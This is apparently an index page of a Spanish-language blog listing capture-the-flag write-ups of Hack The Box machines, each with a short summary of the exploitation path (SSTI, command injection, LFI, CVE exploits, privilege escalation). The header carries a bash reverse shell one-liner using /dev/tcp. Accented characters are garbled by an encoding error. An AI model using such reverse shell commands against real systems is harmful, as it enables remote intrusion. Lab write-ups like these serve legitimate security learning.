sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
Hack The Box - Noter
· 鉁嶏笍 sckull
xss flask_unsign flask python ftp javascript command injection mySQL user-defined functions
Noter presenta un sitio web por donde obtuvimos acceso tras crackear y modificar la cookie de flask, con la informaci贸n que encontramos en el sitio logramos ingresar por FTP donde descubrimos un backup, lo que nos permiti贸 descubrir una vulnerabilidad Command Injection con la cual accedimos a la m谩quina. Finalmente logramos leer la flag root utilizando MySQL y acceso como root con User-Defined Functions.
Hack The Box - Noter
Hack The Box - Timelapse
· 鉁嶏笍 sckull
kerbrute crackmapexec john winrm ruby winpeas LAPS openssl
En Timelapse descubrimos un backup de WinRM, este contenia un certificado de autenticaci贸n de WinRM, mismo que nos permiti贸 obtener acceso a un primer usuario. El historial de PowerShell nos permiti贸 acceder a la contrase帽a de un segundo usuario. Finalmente observamos que el usuario pertenecia a un grupo relacionado a LAPS, lo cual nos permiti贸 obtener la contrase帽a de administrador.
Hack The Box - Timelapse
Hack The Box - Late
· 鉁嶏笍 sckull
ssti python pspy flask
Una aplicaci贸n escrita en Flask que permite convertir imagenes a texto donde identificamos una vulnerabilidad SSTI, tras la explotaci贸n logramos acceder a un primero usuario. Escalamos privilegios agregando una shell inversa a un archivo que se ejecuta cuando un usuario ingresa por SSH.
Hack The Box - Late
Hack The Box - Catch
· 鉁嶏笍 sckull
gitea lets-chat cachet CVE-2021-39174 CVE-2021-39172 apk android jadx apktool jarsigner zipalign
Catch presenta un APK que contiene Tokens de autenticaci贸n lo que nos permiti贸 acceder a Lets Chat, en este 煤ltimo encontramos credenciales. Una vulnerabilidad en Catch permite filtrar las variables de configuraci贸n, tras la explotaci贸n obtuvimos nuevas credenciales y acceso por SSH. Finalmente escalamos privilegios realizando Command Injection en el nombre de una aplicaci贸n de un APK.
Hack The Box - Catch
Hack The Box - Undetected
· 鉁嶏笍 sckull
php phpunit rce gdb ghidra CVE-2017-9841
Tras descubrir una vulnerabilidad RCE en PHPUnit logramos obtener acceso a al m谩quina. Distintos archivos que indicaban una "intruci贸n" y "persistencia" en la m谩quina nos llevaron a un segundo usuario. Finalmente tras analizar distintos ficheros de Apache obtuvimos acceso privilegiado.
Hack The Box - Undetected
Hack The Box - Paper
· 鉁嶏笍 sckull
wpscan wordpress rocket.chat polkit go CVE-2021-3560
En Paper descubrimos una vulnerabilidad que permite leer los posts archivados/privados lo que nos permiti贸 acceder a un link de registro de Rocket.chat, en este ultimo logramos listar y observar el contenido de archivos de la m谩quina con la ayuda de comandos de un Bot, lo que nos dio acceso por SSH. Finalmente escalamos privilegios explotando la vulnerabilidad de Polkit.
Hack The Box - Paper
Hack The Box - Meta
· 鉁嶏笍 sckull
ffuf exiftool exiftool-rce pspy imagemagick command injection neofetch
Tras una enumeraci贸n de subdominios encontramos MetaView la cual utiliza una version de ExifTool vulnerable por la cual logramos obtener acceso a la m谩quina. Tras descubrir un cronjob que ejecuta ImageMagick con una version vulnerable logramos acceder a un segundo usuario. Finalmente escalamos privilegios modificando la variable de configuracion de usuario para neofetch.
Hack The Box - Meta
Hack The Box - Timing
· 鉁嶏笍 sckull
php lfi ffuf wrapper python wget wgetrc python-ftp time
En Timing encontramos una vulnerabilidad LFI que nos permiti贸 obtener el codigo fuente del sitio web, acceder y escalar privilegios en este, posteriormente acceso por una Web Shell donde encontramos credenciales en un backup del sitio para acceder por SSH. Finalmente escalamos privilegios utilizando el archivo de configuraci贸n .wgetrc.
Hack The Box - Timing